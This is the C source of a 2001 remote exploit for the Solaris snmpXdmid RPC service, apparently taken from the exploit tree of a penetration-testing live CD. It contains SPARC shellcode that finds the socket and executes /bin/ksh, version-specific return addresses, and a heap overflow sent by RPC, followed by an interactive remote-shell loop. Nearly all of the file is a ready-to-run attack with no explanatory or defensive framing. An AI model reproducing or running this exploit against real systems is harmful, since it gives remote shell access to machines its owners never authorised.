home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / remote / snmpxdmid.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  8KB  |  211 lines
  1. /*## copyright LAST STAGE OF DELIRIUM mar 2001 poland        *://lsd-pl.net/ #*/
  2. /*## snmpXdmid                                                               #*/
  3.  
  4. /* as the final jump to the assembly code is made to the heap area, this code */
  5. /* also works against machines with non-exec stack protection turned on       */
  6. /* due to large data transfers of about 128KB, the code may need some time to */
  7. /* proceed, so be patient                                                     */
  8.  
  9. #include <sys/types.h>
  10. #include <sys/socket.h>
  11. #include <sys/time.h>
  12. #include <netinet/in.h>
  13. #include <rpc/rpc.h>
  14. #include <netdb.h>
  15. #include <unistd.h>
  16. #include <stdio.h>
  17. #include <errno.h>
  18.  
  19. #define SNMPXDMID_PROG 100249
  20. #define SNMPXDMID_VERS 0x1
  21. #define SNMPXDMID_ADDCOMPONENT 0x101
  22.  
  23. char findsckcode[]=
  24.     "\x20\xbf\xff\xff"     /* bn,a    <findsckcode-4>        */
  25.     "\x20\xbf\xff\xff"     /* bn,a    <findsckcode>          */
  26.     "\x7f\xff\xff\xff"     /* call    <findsckcode+4>        */
  27.     "\x33\x02\x12\x34"
  28.     "\xa0\x10\x20\xff"     /* mov     0xff,%l0               */
  29.     "\xa2\x10\x20\x54"     /* mov     0x54,%l1               */
  30.     "\xa4\x03\xff\xd0"     /* add     %o7,-48,%l2            */
  31.     "\xaa\x03\xe0\x28"     /* add     %o7,40,%l5             */
  32.     "\x81\xc5\x60\x08"     /* jmp     %l5+8                  */
  33.     "\xc0\x2b\xe0\x04"     /* stb     %g0,[%o7+4]            */
  34.     "\xe6\x03\xff\xd0"     /* ld      [%o7-48],%l3           */
  35.     "\xe8\x03\xe0\x04"     /* ld      [%o7+4],%l4            */
  36.     "\xa8\xa4\xc0\x14"     /* subcc   %l3,%l4,%l4            */
  37.     "\x02\xbf\xff\xfb"     /* bz      <findsckcode+32>       */
  38.     "\xaa\x03\xe0\x5c"     /* add     %o7,92,%l5             */
  39.     "\xe2\x23\xff\xc4"     /* st      %l1,[%o7-60]           */
  40.     "\xe2\x23\xff\xc8"     /* st      %l1,[%o7-56]           */
  41.     "\xe4\x23\xff\xcc"     /* st      %l2,[%o7-52]           */
  42.     "\x90\x04\x20\x01"     /* add     %l0,1,%o0              */
  43.     "\xa7\x2c\x60\x08"     /* sll     %l1,8,%l3              */
  44.     "\x92\x14\xe0\x91"     /* or      %l3,0x91,%o1           */
  45.     "\x94\x03\xff\xc4"     /* add     %o7,-60,%o2            */
  46.     "\x82\x10\x20\x36"     /* mov     0x36,%g1               */
  47.     "\x91\xd0\x20\x08"     /* ta      8                      */
  48.     "\x1a\xbf\xff\xf1"     /* bcc     <findsckcode+36>       */
  49.     "\xa0\xa4\x20\x01"     /* deccc   %l0                    */
  50.     "\x12\xbf\xff\xf5"     /* bne     <findsckcode+60>       */
  51.     "\xa6\x10\x20\x03"     /* mov     0x03,%l3               */
  52.     "\x90\x04\x20\x02"     /* add     %l0,2,%o0              */
  53.     "\x92\x10\x20\x09"     /* mov     0x09,%o1               */
  54.     "\x94\x04\xff\xff"     /* add     %l3,-1,%o2             */
  55.     "\x82\x10\x20\x3e"     /* mov     0x3e,%g1               */
  56.     "\xa6\x84\xff\xff"     /* addcc   %l3,-1,%l3             */
  57.     "\x12\xbf\xff\xfb"     /* bne     <findsckcode+112>      */
  58.     "\x91\xd0\x20\x08"     /* ta      8                      */
  59. ;
  60.  
  61. char shellcode[]=
  62.     "\x20\xbf\xff\xff"     /* bn,a    <shellcode-4>          */
  63.     "\x20\xbf\xff\xff"     /* bn,a    <shellcode>            */
  64.     "\x7f\xff\xff\xff"     /* call    <shellcode+4>          */
  65.     "\x90\x03\xe0\x20"     /* add     %o7,32,%o0             */
  66.     "\x92\x02\x20\x10"     /* add     %o0,16,%o1             */
  67.     "\xc0\x22\x20\x08"     /* st      %g0,[%o0+8]            */
  68.     "\xd0\x22\x20\x10"     /* st      %o0,[%o0+16]           */
  69.     "\xc0\x22\x20\x14"     /* st      %g0,[%o0+20]           */
  70.     "\x82\x10\x20\x0b"     /* mov     0x0b,%g1               */
  71.     "\x91\xd0\x20\x08"     /* ta      8                      */
  72.     "/bin/ksh"
  73. ;
  74.  
  75. static char nop[]="\x80\x1c\x40\x11";
  76.  
  77. typedef struct{
  78.     struct{unsigned int len;char *val;}name;
  79.     struct{unsigned int len;char *val;}pragma;
  80. }req_t;
  81.  
  82. bool_t xdr_req(XDR *xdrs,req_t *objp){
  83.     char *v=NULL;unsigned long l=0;int b=1;
  84.     if(!xdr_u_long(xdrs,&l)) return(FALSE);
  85.     if(!xdr_pointer(xdrs,&v,0,(xdrproc_t)NULL)) return(FALSE);
  86.     if(!xdr_bool(xdrs,&b)) return(FALSE);
  87.     if(!xdr_u_long(xdrs,&l)) return(FALSE);
  88.     if(!xdr_bool(xdrs,&b)) return(FALSE);
  89.     if(!xdr_array(xdrs,&objp->name.val,&objp->name.len,~0,sizeof(char),
  90.         (xdrproc_t)xdr_char)) return(FALSE);
  91.     if(!xdr_bool(xdrs,&b)) return(FALSE);
  92.     if(!xdr_array(xdrs,&objp->pragma.val,&objp->pragma.len,~0,sizeof(char),
  93.         (xdrproc_t)xdr_char)) return(FALSE);
  94.     if(!xdr_pointer(xdrs,&v,0,(xdrproc_t)NULL)) return(FALSE);
  95.     if(!xdr_u_long(xdrs,&l)) return(FALSE);
  96.     return(TRUE);
  97. }
  98.  
  99. main(int argc,char **argv){
  100.     char buffer[140000],address[4],pch[4],*b;
  101.     int i,c,n,vers=-1,port=0,sck;
  102.     CLIENT *cl;enum clnt_stat stat;
  103.     struct hostent *hp;
  104.     struct sockaddr_in adr;
  105.     struct timeval tm={10,0};
  106.     req_t req;
  107.  
  108.     printf("copyright LAST STAGE OF DELIRIUM mar 2001 poland  //lsd-pl.net/\n");
  109.     printf("snmpXdmid for solaris 2.7 2.8 sparc\n\n");
  110.  
  111.     if(argc<2){
  112.         printf("usage: %s address [-p port] -v 7|8\n",argv[0]);
  113.         exit(-1);
  114.     }
  115.  
  116.     while((c=getopt(argc-1,&argv[1],"p:v:"))!=-1){
  117.         switch(c){
  118.         case 'p': port=atoi(optarg);break;
  119.         case 'v': vers=atoi(optarg);
  120.         }
  121.     }
  122.     switch(vers){
  123.     case 7: *(unsigned int*)address=0x000b1868;break;
  124.     case 8: *(unsigned int*)address=0x000cf2c0;break;
  125.     default: exit(-1);
  126.     }
  127.  
  128.     *(unsigned long*)pch=htonl(*(unsigned int*)address+32000);
  129.     *(unsigned long*)address=htonl(*(unsigned int*)address+64000+32000);
  130.  
  131.     printf("adr=0x%08x timeout=%d ",ntohl(*(unsigned long*)address),tm.tv_sec);
  132.     fflush(stdout);
  133.  
  134.     adr.sin_family=AF_INET;
  135.     adr.sin_port=htons(port);
  136.     if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
  137.         if((hp=gethostbyname(argv[1]))==NULL){
  138.             errno=EADDRNOTAVAIL;perror("error");exit(-1);
  139.         }
  140.         memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
  141.     }
  142.  
  143.     sck=RPC_ANYSOCK;
  144.     if(!(cl=clnttcp_create(&adr,SNMPXDMID_PROG,SNMPXDMID_VERS,&sck,0,0))){
  145.         clnt_pcreateerror("error");exit(-1);
  146.     }
  147.     cl->cl_auth=authunix_create("localhost",0,0,0,NULL);
  148.  
  149.     i=sizeof(struct sockaddr_in);
  150.     if(getsockname(sck,(struct sockaddr*)&adr,&i)==-1){
  151.         struct{unsigned int maxlen;unsigned int len;char *buf;}nb;
  152.         ioctl(sck,(('S'<<8)|2),"sockmod");
  153.         nb.maxlen=0xffff;
  154.         nb.len=sizeof(struct sockaddr_in);;
  155.         nb.buf=(char*)&adr;
  156.         ioctl(sck,(('T'<<8)|144),&nb);
  157.     }
  158.     n=ntohs(adr.sin_port);
  159.     printf("port=%d connected! ",n);fflush(stdout);
  160.  
  161.     findsckcode[12+2]=(unsigned char)((n&0xff00)>>8);
  162.     findsckcode[12+3]=(unsigned char)(n&0xff);
  163.  
  164.     b=&buffer[0];
  165.     for(i=0;i<1248;i++) *b++=pch[i%4];
  166.     for(i=0;i<352;i++) *b++=address[i%4];
  167.     *b=0;
  168.  
  169.     b=&buffer[10000];
  170.     for(i=0;i<64000;i++) *b++=0;
  171.     for(i=0;i<64000-188;i++) *b++=nop[i%4];
  172.     for(i=0;i<strlen(findsckcode);i++) *b++=findsckcode[i];
  173.     for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
  174.     *b=0;
  175.  
  176.     req.name.len=1200+400+4;
  177.     req.name.val=&buffer[0];
  178.     req.pragma.len=128000+4;
  179.     req.pragma.val=&buffer[10000];
  180.  
  181.     stat=clnt_call(cl,SNMPXDMID_ADDCOMPONENT,xdr_req,&req,xdr_void,NULL,tm);
  182.     if(stat==RPC_SUCCESS) {printf("\nerror: not vulnerable\n");exit(-1);}
  183.     printf("sent!\n");
  184.  
  185.     write(sck,"/bin/uname -a\n",14);
  186.     while(1){
  187.         fd_set fds;
  188.         FD_ZERO(&fds);
  189.         FD_SET(0,&fds);
  190.         FD_SET(sck,&fds);
  191.         if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
  192.             int cnt;
  193.             char buf[1024];
  194.             if(FD_ISSET(0,&fds)){
  195.                 if((cnt=read(0,buf,1024))<1){
  196.                     if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
  197.                     else break;
  198.                 }
  199.                 write(sck,buf,cnt);
  200.             }
  201.             if(FD_ISSET(sck,&fds)){
  202.                 if((cnt=read(sck,buf,1024))<1){
  203.                     if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
  204.                     else break;
  205.                 }
  206.                 write(1,buf,cnt);
  207.             }
  208.         }
  209.     }
  210. }
  211. /*                www.hack.co.za           [23 April 2001]*/